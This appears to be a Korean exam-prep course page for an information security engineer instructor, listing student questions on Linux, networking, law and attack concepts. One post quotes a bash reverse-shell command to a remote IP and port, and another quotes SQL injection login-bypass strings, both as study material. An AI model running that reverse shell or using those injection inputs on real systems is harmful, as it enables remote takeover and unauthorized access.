주메뉴바로가기 본문바로가기
닫기

교수 홈

정보보안(산업)기사

정일영 교수님

교수님 소개

🎓 약력

성균관대 컴퓨터공학 석사
전) 새마을금고중앙회 IT부분 디지털개발부 근무
K-Shield(최정예 사이버보안) TOP 10인증( 미래창조과학부/2013)
민간분야 정보보호유공자 표창(행정자치부/2016)
소프트웨어 보안약점 진단원(행정자치부/2016)
정보보안기사/정보처리기사/OCP/MCDBA/MCSE/SCJP 등)
현)지안에듀 컴퓨터일반 전임강사
현)알기사 정보보안기사 실기 강사

📖 저서

알기사 정보보안기사 실기 탑스팟 저자

BEST 강의

정보보안(산업)기사 기본서·문제집 1위 저자, 정일영 교수님의 BEST 강의를 만나보세요.

커리큘럼

실기는 정일영 교수님 커리큘럼만 타면 합격 준비는 끝.
커리큘럼 대로 수강해 보세요.

01

필기 대비가 끝났다면 다음 시험인 실기 시험 준비는 필수!
실기 기초 이론에서 심화와 문제 풀이까지 올인원! 실기 대비를 한번에 끝낼 수 있습니다.

수강후기

강의를 직접 수강한 수강생들의 리얼한 후기! 실제 수강생들이 후기로 강의 퀄리티를 증명합니다.

강의 질문

답변완료

정보보안법규 관련 질문드립니다

정보보안법규 중 정보통신기반보호법, 전자서명법, 위치정보보호법에 관한 강의는 없나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

최현준 2022-07-06
답변완료

LSA, SRM 어느것이 접근권한 관리를 하는 것인가요?

LSA : 자원에 대한 접근 검사를 수행한다. SRM : SID 를 기반으로 접근을 허용할 지 여부를 결정한다. 이렇게 나와있는데요, LSA와 SRM 둘 다 접근통제를 수행하는 것인가요 ? 아니면 둘 중 하나를 고르라는 문제가 나오면 SRM을 골라야 하는 것인가요 ? 두가지의 차이를 제대로 이해하지 못하여서 질문 드립니다. 답변주시면 감사하겠습니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

김성호 2022-07-05
답변완료

웹 서버 취약점 관련 질문

강사님 안녕하세요! 웹서버 취약점 섹션 내 보안서버 구축(p.454) 쪽에 보안서버 구축의 법적 근거 내용 중 "개인정보의 기술적 관리적 보호조치 기준"과 "개인정보의 안전성 확보 조치 기준"에 모두 바이오 정보로 표기되어 있습니다. 법률 강의 때 바이오 정보는 개정되서 생체인식정보로 바뀌었다고 하셨었고, 국가법령정보센터에서 2개의 고시 모두 찾아봤는데 "생체인식정보"로 표시되어있습니다. 아무래도 내용 개정에서 누락된거 같습니다 감사합니다!!

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이은아 2022-07-04
답변완료

실습 프로그램을 사용해서 직접해보고 싶은데, 어떤 프로그램을 이용하면 될까요?

강의 잘듣고 있습니다. 강의 내용에 매우 만족하며 잘 듣고 있는데, 중간중간 실습화면으로 보여주시는 내용으로 인해 이해가 더욱 잘되고 있습니다. 그런데, 저도 강의를 듣고난 후 공부한 이후에 프로그램을 이용하여 실습을 해보고 싶은데, 혹시 무료로 아니면 유료라도 어떤 프로그램을 설치해서 이용해볼 수 있는지 문의드려도 될까요??

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

노욱한 2022-07-04
답변완료

마지막 강의 이어학습하기 질문요.

10강부터 봐야하는데 실제적으로 8강으로 틀어지고 어제도 6강까지 봤는데 2강부터 나오고 왜이런가요 도대체 ?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

강주형 2022-07-04
답변완료

갤럭시텝 dex 모드로 인강 수강 불가한지 문의드립니다.

starplayer 앱이 설치되어있음에도 불구하고 컴퓨터 웹 브라우저로 인식이 되는지 자꾸 실행파일을 다운하라고 하는데 해결방법 문의드립니다! 해결됏습니다

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

황준태 2022-07-02
답변완료

2022 실기 문제편 문의

보안기사 2022 실기 문제편에 ​ 707번 작년 기출인데 존재하지 않은 외부 ip spoofing 공격에 대응하기 위한 패킷 필터링 기술의 답이 ​ ingress필터링인데 이거 unicast rpf 필터링은 답이 될 수 없나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-07-01
답변완료

sql injection 질문

안녕하세요 교수님 75강 sql injection 강의에서 예문을 id = ' ' or 1=1 # id = ' ' or 1=1 -- id = ' ' or 'a' = ' 로 작성해주셨는데 위의 두가지는 뒤에 오는 문장을 주석처리로 하기 때문에 참 OR 참 인 걸 알겠는데 마지막 'a' =' 로 끝나는 건 뒤에 pass 부분을 어떻게 처리하는지 이해가 안갑니다. 항상 강의 잘 듣고 있습니다. 감사합니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

손혜림 2022-06-29
답변완료

레인보우 테이블 공격

매번 다른 challenge값 으로 인증을 하니 challenge & Response 방식이면 레인보우 테이블 취약점은 해결 된 건가요??

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

박승혁 2022-06-27
답변완료

정일영 강사님 문제풀이 동영상은 어디서 볼수있나요?

실기 책자 2권에 문제가 엄청 많이 있는데요 이거 설명하는 동영상은 어디서 볼수 있나요 혼자 풀기는 양도 많고 힘들어요,,,,,,,,,,,,

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이승연 2022-06-23
답변완료

강의자료 를 어디에서 볼수 있는지?

보안기사 실기 듣고 있습니다 강의 교재에는 없는 내용을 보조자료(?), 핵심정리자료 라는 이름으로 강사님이 별도로 작성 해 놓으신것이 있는것 같은데요 교재에 없어서 상당히 답답합니다 강의 듣는사람이 어떻게 강의자료를 다운받아서 프린트해서 쓸수는 없느지요? 이런 보조자료는 왜 책에 삽입을 안했는지 답답합니다 별도로 프린트해서 공부해야 하는것이 쉽지는 안습니다 ㅠㅠㅠㅠㅠㅠ

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이승연 2022-06-21
답변완료

개보법 안전성확보조치 기준 문의

기술적 관리적 물리적으로 개인정보의안전성 확보조치를 나누신 프린트를 보고있는데 혹시 어떤기준으로 나뉘었는지 알 수있을 까요?? 법령이라던지 자료알려주시면 감사하겠습니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-06-21
답변완료

개인정보 안전성확보조치 기준

프린트에 개인정보보호법 시행령 30조 개인정보안전성확보조치에 기술적, 관리적, 물리적 보호조치가 나눠저 있는데 나누는 기준을 어떻게 정하신 건 가요?? 법령이나 어디 자료에 따로 나와있나요?? 타사 관련 기출에는 보안프로그램 설치가 관리적 조치로 나와있는데 개보법을 강사님 프린트로 공ㅇ부하고 있어서 알려주시면 감사드리겠습니다 !!

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

박인우 2022-06-17
미답변

-

- 이 질문 삭제부탁드립니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

정유진 2022-06-16
답변완료

TCP Connect scan에서 OPEN 상태 RST+ACK

안녕하세요 강의를 듣다가 확신이 안서는 부분이 있어서 질문 남깁니다. TCP connect 스캔에서 OPEN상태일때 3-way handshake가 끝나고 종료할때 RST가 아닌 RST+ACK을 보내는 이유가 연결설정이 되고 공격자가 마지막으로 ACK를 보낸 후 타겟으로부터 따로 ACK가 도착하기 전이기 때문에 이전 연결설정 SYN+ACK의 seq번호를 ACK번호로 설정해서 RST+ACK플래그 설정후 보냈다고 생각하면될까요

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

구병주 2022-06-10
답변완료

52강 51. 네트워크 기본 학습 ACK 질문

안녕하세요 교수님 강의 너무 잘 듣고 있습니다 52강 51. 네트워크 기본 학습 강의에서 19:10 쯤 내용에서 실제 존재하는 IP로 위조되었다면 RST+ACK 반환된다고 하셨는데 존재 IP ----SYN----> 타겟 <-SYN+ACK- 니까 룰에 맞춰서 RST 반환이 되어야 하는거 아닌가요? 타겟 입장에서는 연결을 유지할 필요.. 가 없으니까요..?(이유가 맞는지는 잘 모르겠습니다;;)

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

손혜림 2022-06-09
답변완료

36강 31분쯤에 TCP/IP의 Transport Layer와 Internet Layer

강의에서는 TCP/IP 의 전송계층과 인터넷 계층을 Node to Node라고 했는데 End to End의 오타라고 생각하면 될까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

구병주 2022-06-08
답변완료

기출문제 043번 (B) 답안 질문드립니다.

(B) 답으로 버퍼오버플로우 공격으로 되어 있습니다. (B)을/를 통하여 스택에서 리턴 어드레스를 수정하면 프로세스의 흐름을 조정할 수있다. 지문의 스택이 언급되어 있어 스택 버퍼 오버플로우가 더 정답에 가깝지 않나 문의드립니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

박경훈 2022-06-06
답변완료

ISAC 문의

안녕하세요 강사님 공부하다가 계속 ISAC 과 CERT가 자꾸 겹치는데 두 기관의 역활이 똑같은 건가요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-06-04
답변완료

스타플레이어 앱 재생불가

동영상 강의누르면 캡쳐화면과같이 앱실행이 안되는데 왜그럴까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

최현준 2022-05-30
답변완료

63강이 재생이 안됩니다.

아마도 반복회차가 다되서 그런거 같은데요 ㅠ 초기화 좀 부탁 드립니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

윤대희 2022-05-24
답변완료

강의 일시정지 관련

안녕하세요 실기강의를 일시정지하고 싶은데 일시정지 할 수 있는 방법이 있을까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

유세영 2022-05-20
답변완료

추가 학습자료

추가 학습자료를 파일로 받을 수 있나요 ?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김혜진 2022-05-18
답변완료

1강 옆에 강의자료 다운로드 받는 버튼

구름 눌렀는데 정보처리산업기사 실기 관련 자료입니다. 정보보안기사 실기 자료는 없나요

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

구병주 2022-05-14
답변완료

추가 학습 노트 자료 어디서 구할 수 있나요?

-

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김용덕 2022-05-14
답변완료

강의 일시중지는 없나요??

잠시 일시중지하고싶은데 할 수 없을까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김민재 2022-05-12
답변완료

원노트 자료

안녕하세요 강의를 듣고 있는데 원노트 강의자료파일을 받을 수 있을까요 ?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김현진 2022-05-12
답변완료

68강 dns 동작방식 설명에 원노트 자료 어디서 볼 수 있을까요?

개인적으로 정리하는데 이미지가 있으면 좋을거 같아서 문의 드립니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

신현욱 2022-05-11
답변완료

원노트 자료 다운로드

원노트 자료는 어디서 다운로드 가능할까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김유준 2022-05-10
답변완료

원노트 자료

원노트 자료 어디에서 확인 할 수 있나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

성희진 2022-05-10
답변완료

개보법

개인정보 유출 통지와 파기의 경우 지체없이 알리거나 파기해야된다고 나와있는데 여기에만 (5일 이내)라고 적혀져 있는데 법령 사이트에서는 안나와있어서요 왜 5일이내 인가요?? 그리고 개인정보보호법에서 지체없이가 나오면 모두 5일 이내라고 봐야되나요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-05-07
답변완료

노트 자료

강의에서 사용된 노트 자료는 따로 다운 받을 수 있나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

유찬빈 2022-05-06
답변완료

원노트 자료는 어디서 구할 수 있나요?

강의에 사용 된 원노트 자료는 어디서 확인할 수 있을까요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

윤정택 2022-05-02
답변완료

아이노드 리스트에 관하여

파일 텍스트를 hello 에서 world 로 변경하였을 경우 5byte에서 5byte로 파일 크기에 변화가 없는데 이 경우에는 그럼 M, A 만 바뀌는건가요?(=change time은 바뀌지 않나요?)

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

손혜림 2022-04-29
답변완료

필기노트 pdf자료 받을수 있나요?

25강 버퍼오버플로 공격 설명전에 프로그램 작동방식에 대해 자세히 설명해주셔서 좋았는데요, 교재에는 프로그램 작동방식이 자세히 안나온듯합니다. sp sfp ret 설명해주신 자료를 혼자 공부할때 다시 보고 싶은데 필기노트pdf자료를 여기 사이트나 알기사카페에서 제공해주시나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이재형 2022-04-29
답변완료

php 문의( 어플리케이션 보안관련)

안녕하세요 선생님 책하고 강의보다가 궁금한게 있는데요 첨부파일에 보면 $black list = array( 이하 생략 ~~~~; 이 부분에서 //허용하지 않는 문자리스트(../,./,%,..\,.\)이렇게 작성되어있씁니다. 이스케이프문자였던가 강의해서 그렇게 알려주신걸로 생각되는데 근데 ..\랑 .\는 왜 \\\\ 이렇게 되어있는걸까요.? 구글링해도 안나오더랍니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

명두희 2022-04-23
답변완료

sudo 명령 관련하여 질문드립니다.

[sudo 명령어 및 sudoers 파일 설정]에서 "sudo 명령을 실행할 호스트의 호스트명을 또는 IP, 모든 서버가 대상이면 ALL 지정"에서 sudo 명령이 다른 호스트에서 실행이 될 수 있는가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

윤정택 2022-04-22
답변완료

실기시험질문

실기험볼때 리눅스명령어말고 예로 RUDY 같은거 rudy 이렇게 답안적으면 틀리나요?>

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

함지환 2022-04-21
답변완료

질문

실기 145번 문제 (c) /home \(-type f -a -perm -2 \ ) -print 여기서 해석이 기타사용자에게 쓰기권한파일출력이라되어있는데 기타 사용자( others) 인걸 어떻게아는건가요?> 그리고 -a 뜻이궁금합니다

2020 정보보안(산업)기사 실기시험대비 강의 [교재별도구입+5%적립]

함지환 2022-04-20
답변완료

I/O redirection 질문드립니다

/bin/bash > /dev/tcp/10.10.10.10/8081 0<&1에서 bash 쉘의 출력을 TCP 클라이언트 소켓으로 재지정했다는 내부적인 의미가 FDT의 1번이 stdout에서 /dev/tcp/10.10.10.10/8081으로 변경된거라고 생각했습니다. 그래서 0<&1으로 입력까지 TCP 클라이언트 소켓으로 받을 수 있게 된거라고 이해를 했는데요, 생각해보니 ㅁㅁ > /dev/null 2>&1의 경우는 출력은 버리고 에러는 표준출력으로 보내는거였는데, 그럼 FDT의 1번이 /dev/null로 변경된게 아닌 것 같아서 혼란스럽습니다. &1을 단순히 stdout으로 생각해야할 것 같은데, 그럼 0<&1으로 입력까지 TCP 클라이언트 소켓으로 받을 수 있다는게 이해가 되지 않습니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

조은혜 2022-04-18
답변완료

강의 Section 144 RSA 생성방법 변경요청

RSA 암호생성 방법 방법이 이상합니다. 교제에는 1. 키를 생성하기 위한 p와 q 생성 N=p*q 2. 키 생성을 위한 중간 숫자 L 계산 L = lcm(p-1, p-1) 3. 중간 숫자 L을 이용해여 공개키를 위한 E 찾기 (단, E는 1 보다 크고 L 보다 작으며, gcd(E,L)=1 이다.) 4. 중간 숫자 L과 공개키 숫자 E를 이용하여 개인키 숫자 D 찾기 (단, D는 1 보다 크고 L 보다 작으며, E*D mod L=1 이다.) 라고 젹혀있는데요. 실제 RSA 생성방법은 아래와 같거든요. 1. N = p * q를 구한다. 2. φ(n)=(p-1)(q-1)를 계산한다. 3. φ(n)보다 작고 φ(n)과 서로소인 임의의 자연수 e를 선택한다. 4. 1 = ed mod (p-1)(q-1)를 만족하는 d를 찾는다. 예를 들어 p가 3, q가 7이라면 N은 33, φ(n)은 20, N과 서로소인 e를 13으로하면, d는 17이 되어 공개키는 (33, 13) 비밀키는 17이 됩니다. 강의를 이렇게 수정하였으면 좋겠습니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김경준 2022-04-18
답변완료

문제집 snort rule 문의

13년 2회 기사 랑 18년 12회 기사 문제가 똑같이 둘다 Http get flooding 공격으로 content는 요청헤더 문자열 패턴 매칭하는 탐지룰인데 한쪽은 목적지 ip 기준이고 한쪽은 소스 ip 기준인데 상관 없는 건가요?? 그리고 Snort rule 순서는 크게 상관없나요 ?? nocase랑 depth 위치가 서로 달라서요 답변부탁드립니다. 감사합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-17
답변완료

root 원격접속제한 관련 문의

강의 듣다가 궁금한게 생겨서 질문드립니다. root원격 접속을 제한하는 방법에는 1. /etc/ssh/sshd_config에서 PermitRootLogin = No 로 바꾸는 방법 2. PAM 모듈 사용을 통해 root 원격접속을 제한하는 방법 2가지가 있는데, PAM모듈에서 root원격접속을 제한하고, 서버에서 1번 설정을 YES로 하는 경우에 root로 원격접속이 가능한건가요? 반대의 경우, (PAM모듈에는 root원격접속을 제한하지 않도록 설정하였으나, /etc/ssh/sshd_config 에서는 root원격접속을 제한한경우) 에도 root 계정 원격접속이 가능한건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이헌민 2022-04-17
답변완료

p619 워터링홀 침해사고분석 부분 ssh 포트포워딩부분 질문있습니다.

여기선 ssh 리모트 포트포워딩을 이용하는 것으로 알고있습니다. 619page의 (다) 항목에서는 ssh클라이언트 등의 추가 공격도구를 "다운로드"한다 라고 적혀있는데 (다)-1 항목에서는 ssh 클라이언트를 알기사 사이트 관리자 pc로 "업로드"한다라고 적혀있습니다.. ssh 리모트 포트포워딩을 위해선 관리자pc로 "업로드"가 맞다고 생각하는데 (다)에서 업로드가 아닌 다운로드라고 표현한 것은 표현의 편리상 그냥 "다운로드한다"라고 한건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

석인기 2022-04-16
답변완료

tcp wrapper 데몬관련해서 질문드립니다

telnet데몬 관련해서 hosts.allow나 hosts.deny파일에 등록할때 서비스명을 in.telnetd로 설정하는것으로 교재에 나와있었는데요(마찬가지로 ftp도 in.ftpd로 나와있었구요) 문제편에서보니 ssh를 등록할때는 서비스명을 sshd로 등록하는것으로 나와있는데 telnetd앞에 in은 어떤의미인건가요?? telnet과 ftp에는 in을 붙이고 ssh에는 in을 안붙이는건가요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

도현수 2022-04-15
답변완료

Set 전자서명

Set 전자서명에서 참여자역할을 예로 들어주실 수 있으신가요?? 제가 생각한 바로는 issuer 가 요즘 카카오 지불카드와 같은 거고 acquirer 은 예를들어 kb은행 지불게이트웨이는 kb pay 나 결제 시스템으로 생각하면 되나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-15
답변완료

아파치 설정 문의

안녕하세요 어플리케이션보안 문제 풀다가 문의 드리게 됐습니다. 아파치 웹서버에서 timeout, keepalivetimeout 설정의 차이가. Timeout은 예를들어 클라이언트가 slow post dos와 같은 공격을 했을 때 메시지 헤더나 바디에 타임아웃 설정을 해서 그 요청 세션을 종료하는 것이고 Keepalivetimeout은 tcp 연결에 대한 timeout 설정으로 이해했는데 이게 맞나요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-15
답변완료

웹 서버 캐시서버 설정문의

질문이 여러개인데 너무 헷갈리네요 ;; 1. Cache-control 헤어의 max-age=0 와 no-cache 가 동일성 윰무에 대해 체크하는 차이만 있다고 나와있는데 동일성 유무 체크라는 게 정확히 어떤 메커니즘의 체크를 말하는 건가요? 2. 캐시 검증하는 헤어 설정이 User-agent 헤더에서 must-revalidate 와 no-store ( cc attack 시 쓰임 ) Cache-control 헤더의 max-age=0, no-cache 는 왜 다른 헤더를 사용하나요?그리고 서로 어떤 목적의 차이가 있는지 알려주실 수 있나요?? 3. 마지막으로 Cache-control 헤더의 max-age=0, no-cache도 cc attack 시 사용하는 헤더 설정이 될 수 있는지 궁금합니다. 감사합니다. ^^

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-15
답변완료

문제집 문의

안녕하세요 올해 목표로 기사준비중인데 21년실기문제지로 공부히고있는데 올해 실기문제지도 변경사항ㅇ이 많은가요??

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-15
답변완료

강의 자료

전반적인 강의 내에서 활용하신 책 이외의 원노트 자료는 어디서 확인할 수 있나요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

문나래 2022-04-15
답변완료

개행문자 문의

개행문자(crlf)를 핵사코드로 적을 때 0x0d0a가 맞나요 0x0d0x0a가 맞나요??? P418강의에서는 cr과lf를 분리해서 설명해주시고 p241강의에서는 0x0d0a라고 책에 적혀있어서요

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

김정길 2022-04-14
답변완료

경로 추적 관련 질문

교수님 안녕하세요. 작년까지는 파일 다운로드 내 Directory Traversal 공격이 같이 설명이 되어있었는데 22년 교재부터는 따로 섹션이 분리되서 설명이 되어있습니다. 분리가 되어 있으니 강의 보다보니 너무 헷갈려서요.. 제생각에는 Directory Traversal이 가능하기 때문에 파일 다운로드 취약점이 발생하는 걸로 이해를 했는데 맞는건지 궁금합니다.. 두개 내용만 봤을때는 너무 헷갈리네요 ㅠㅠ 감사합니다!

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이은아 2022-04-13
답변완료

로그파일 답안 작성시

로그파일 답안 작성시 사진의 67번 문제처럼 utmp(x),wtmp(x) 처럼 (x)를 붙여 쓰는 답도 있고, 68번 문제처럼 utmp,wtmp와 같이 (x)를 붙이지 않는 것도 있는데 이 둘의 차이점이 있나요? 있다면 언제 (x)를 붙여야 하는지 궁금합니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이승혜 2022-04-12
답변완료

리눅스 시스템에서 파일명

62번 문제처럼 파일명을 입력하라고 하면 /etc/inetd.conf 가 아닌 inetd.conf라고만 하면 오답처리가 되는 건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이승혜 2022-04-12
답변완료

간단하게 궁금한 것들 질문드립니다.

1. 계정을 생성할 때, /etc/login.defs 파일을 통해 패스워드 정책을 설정한다고 배웠습니다 그러면 이때 login.defs 파일을 통해 설정된 패스워드 정책이 /etc/shadow 파일에 저장되는 게 맞겠죠? 2. 프로세스가 기동되면 가상메모리를 할당받는데, 가상메모리는 유저영역+커널영역으로 나뉜다 했습니다. 이때 유저영역은 프로세스가 사용하는 공간이라 했는데, 유저영역에는 대표적으로 PCB와 FDT가 존재합니다. 각각의 기능은 PCB를 통해 해당 프로세스가 자신의 상태를 관리하고 (ready, running, blocked, terminated) FDT를 통해 자신이 오픈한 파일디스크립터들을 관리하는 것이 맞나요? 3. 관리목적의 시그널에 대표적으로 SIGINT, SIGKILL, SIGSTOP이 있다고 했는데 SIGKILL과 SIGSTOP은 임의로 처리하거나 무시할 수 없는 시그널이라 했는데 SIGINT도 똑같이 임의로 처리하거나 무시할 수 없나요? 언급이 따로 없으셔서 궁금해서 질문드립니다. 그리고 SIGINT의 기능이 해당 시그널을 받은 프로세스는 Default로 종료되고, 터미널 제어권을 넘긴다 했는데 이 터미널 제어권을 넘겨받는 대상이 커널인지 아니면 해당 종료되는 프로세스를 실행시킨 프로세스인지 궁금합니다. 4. Linux 계정의 비활성화 기간은 계정만료일 이후에, 패스워드를 변경하도록 하는 일종의 유예기간으로 이해했는데 맞을까요? 그리고 분명히 말씀주셨던 건데 중요한건 아닌거 같지만 실습해보니 좀 다른거 같아서 질문드려요 제 기억으로는 해당 유예기간동안 로그인을 시도할 시 로그인은 되는데, 비밀번호를 변경하라 하는데 해당 기간이 지나버리게 되면 관리자를 통해 비밀번호를 바꿔야 한다고 하셨거든요 그런데 제가 지금 CentOS7 환경에서 테스트해보니 20220410으로 계정만료일을 설정하고 테스트해보니 로그인이 안되고 관리자한테 연락하라고 나옵니다. 그리고 root로 su [만료된계정] 으로 하면 로그인은 되는데 이런 경우는 특별한 경우니 무시해도 되는 거죠? 테스트해본 결과 CentOS7에서 계정 만료일이 만료되고, 비활성화 기간 동안 로그인이 불가능하며 관리자에게 문의하라 뜹니다. 그리고 만료일이 3일 남은 상태에서 이전 경고일수와 비활성화 기간이 7로 설정되어 있음에도 불구하고 경고 알림이 보이진 않네요 어떻게 기억하는 게 교과서적으로 맞을지 헷갈려서 질문드립니다..ㅠ 5. crontab파일은 사용자별로 만들어져서 관리가 된댔는데 crontab 명령어는 /etc/crontab 파일에 대한 명령어로 알고 있습니다. 이때 사용자별로 만들어진다길래 찾아보니 스케줄러가 /var/spool/cron 디렉토리에 계정별로 파일 형태로 저장되어 있다고 합니다. 여기서 좀 헷갈리는 부분이 root는 /etc/crontab에 스케줄러를 등록하고 일반 사용자는 /var/spool/cron에 파일형태로 스케줄러를 등록하는 게 맞을까요? 그래서 /etc/cron.allow 및 /etc/cron.deny 파일을 통한 crontab 명령어 접근제한은 root는 /etc/crontab 파일을, 다른 일반 사용자는 /var/spool/cron에 자신의 cron파일을 접근하는 것을 제한하는 설정인지 궁금하여 질문드립니다. 6. xinetd의 설정파일 주요 옵션 중에 cps는 초당 연결개수가 초과되면 일시적으로 서비스를 중지시키는 옵션이잖아요? 이때 초당 연결개수라는 것이 동일한Client로부터 발생하는 초당 연결개수를 의미하는 거겠죠? 7. 그리고 xinetd 설정파일 주요 옵션 중 per_source 옵션은 동일한 Source IP로 부터(즉, 동일한 Client로부터) 동시 연결개수에 제한을 두는 옵션으로 알고 있습니다 그러면 만약에 HTTP 서비스에 해당 옵션을 적용한다면, Client는 Keep-Alive 속성에 의해 추가자원을 동시에 요청할 때 해당 per_source가 5라면 5개의 동시연결 요청만 수행하고 다시 TCP연결을 맺은 후 Keep-Alive에 의해 5개를 요청하고 이렇게 제한되는 게 맞을까요? 글이 길어지다보니 이어져서 보여서 메모장으로 별도 단락 구분지어 첨부했습니다. (여담인데 아마 이것도 파일업로드 입력값 검증을 안 하는 걸까요 ㅎㅎ img파일만 가능한데 txt파일도 올려지네요) [+] 아 그리고 syslog나 rsyslog의 경우 (r)syslog로 적어도 되나요? 아니면 리눅스의 경우 전부 syslog로 적어야 하나요?

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-04-12
답변완료

문제편 질문드립니다.

1. 43번 문제의 (B) 문항 질문입니다. "스택에서 리턴 어드레스를 수정하면" 를 보고 스택버퍼오버플로우 공격이라고 생각했지만, 정답에는 버퍼오버플로우로 되어있네요. 버퍼 오버플로우가 맞는거라면, 스택버퍼오버플로우가 되려면 어떤 키워드들이 더 필요한지 알려주세요. 2. 24번 문제 TMOUT=600; export TMOUT export를 통해 환경변수로 설정하는 이유가 해당 쉘이 아닌 자식 쉘까지 모두 타임아웃을 설정하기 위해서인가요 ? export를 환경변수를 통해 어떤 설정으로 다른 사용자들에게 어떤 영향이 끼치는지 궁금합니다.

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

주익형 2022-04-11
답변완료

강의자료 받을 수 있는건가요??

강의도중에 추가자료같은거 출력해서 보라고 하셨는데 어디서 받는지 모르겠습니다. 받을 수 있는건가요??

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

전판호 2022-04-11
답변완료

질문

대학교에서 PCB는 운영체제가 관리하기 위해 커널 영역에 유지하는 정보라고 배웠는데 여기서는 유저 영역이라고 나와서 헷갈리네요! 어느것이 맞나요? 또한 커널 영역 하나에 여러 프로세스의 pcb을 저장하는것으로 배웠는데 이 책에서는 프로세스별로 user,kernel 영역이 존재하는 건가요? 그렇다면 system open file table은 같은 내용을 커널 영역이 함께 공유하는 건가요?

2022 정보보안(산업)기사 실기대비 강의 [교재별도]

이소율 2022-04-10
답변완료

2021 실기 문제지

146번에 백업파일의 접근권한을 644에서 600으로 변경하고, 백업파일 쉡 스크립트 파일의 접근권한을 소유자만 사용가능하도록해서 700으로 설정됐는데 백업파일접근권한이 왜 600으로 설정해야 하는지랑 쉘 스크립트 파일의 접근권한은 소유자만 사용가능하다고 한 것이 실행권한 어떤 권한(r,w,x중)을 의미하는지 아니면 이것도 표준화 돼있는 건지 궁금합니다.

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

박인우 2022-04-09
답변완료

취약성과 취약점?? 실제 시험에선 어떻게 적어야 할까요?

위험관리쪽 보안용어를 살펴보면 <자산, 위협, 취약점or취약성>이 나오는데요 이때 교재+핵심자료를 보면 교재에는 "취약점: 위협의 이용대상으로 기술적, 물리적, 관리적 약점"이라 정의되어 있고 핵심자료(인강)에는 "취약성: 자산의 잠재적 속성으로 위협의 이용대상이 되는 것"이라 나와있습니다. 찾아보니 취약성->내포하고있어서 미래에 발견될 개념 취약점->취약성이 발견되어 판명된 현재의 개념 이라고도 표현해서, "취약성"보다는 "취약점"이 더 옳은 표현에 가깝다고 하시는 분들도 있고.. 솔직히 이런 사소한 거 신경 안 쓰고, 둘이 구분없이 취약점이나 취약성으로 마음 편하게 적고 싶지만.. 워낙 시험에 대해 채점기준이 모호하기도 하고 깊게 들어가면 취약성과 취약점이 한끗차이로 의미가 조금 변질될 수도 있다보니 어떤 답을 쓰는 게 명확하고 분란의 여지가 없을지 싶어서 질문글 남기게 됐습니다. 혹시라도 위험의 구성요소를 적으라 하면, <자산, 취약점(취약성), 위협, 정보보호대책>으로 괄호로 묶어서 적어도 될까요? 감사합니다

2021 정보보안(산업)기사 실기대비 강의 [교재별도]

이지환 2022-04-09
답변완료

주요 취약점에 NTP, SSDP 분산 서비스 거부(DDoS) 취약점 질문드립니다.

